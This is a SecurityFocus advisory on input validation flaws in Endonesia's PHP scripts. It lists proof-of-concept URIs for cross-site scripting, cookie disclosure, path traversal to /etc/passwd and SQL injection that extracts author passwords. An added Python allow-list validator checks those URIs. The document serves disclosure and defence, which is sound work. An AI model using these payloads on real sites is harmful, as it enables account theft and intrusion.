Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities

An attacker can exploit these vulnerabilities via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://www.example.com/en/friend.php your Friend:[XSS]
http://www.example.com/en/admin.php Main Text: [XSS]
http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid=><script>document.write(document.cookie)</script>
http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00
http://www.example.com/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
http://www.example.com/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*
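
Every mod.php URI above places markup, a file path or SQL in a parameter that should only hold a module name or a numeric id. The following added example (not part of the original advisory and not Endonesia's own code) applies allow-list validation to those parameters and reports which ones a request violates. The rules are assumptions, since the page does not document the parameter types: "mod" and "op" are treated as short lowercase identifiers and "cid", "did" and "intypeid" as unsigned integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed rules (the advisory does not list Endonesia's modules or parameter types):
# "mod" and "op" are short lowercase identifiers, the id parameters are unsigned integers.
IDENT_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")
UINT_RE = re.compile(r"[0-9]{1,10}")
RULES = {"mod": IDENT_RE, "op": IDENT_RE,
         "cid": UINT_RE, "did": UINT_RE, "intypeid": UINT_RE}


def check_request(uri):
    """Return {param: reason} for every query parameter that fails validation."""
    problems = {}
    seen = set()
    # parse_qsl percent-decodes values, so %00 and %20 are checked in decoded form.
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name in seen:
            problems[name] = "repeated parameter"
            continue
        seen.add(name)
        rule = RULES.get(name)
        if rule is None:
            problems[name] = "unexpected parameter"
        elif "\x00" in value:
            problems[name] = "NUL byte"
        elif not rule.fullmatch(value):
            problems[name] = ("not an identifier" if rule is IDENT_RE
                              else "not an unsigned integer")
    return problems


# First entry is a constructed benign request; the rest are URIs from the list above.
SAMPLES = [
    "http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=5",
    "http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5",
    "http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid="
    "><script>document.write(document.cookie)</script>",
    "http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00",
    "http://www.example.com/en/mod.php?mod=diskusi&op=viewcat"
    "&cid=-2%20union%20select%200,0,0/*",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(check_request(uri) or "ok", "<-", uri)
```

Validation of this kind rejects the requests before they reach file inclusion or query construction; parameterized queries and output encoding are still needed in the application itself.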


 

Copyright 2010, SecurityFocus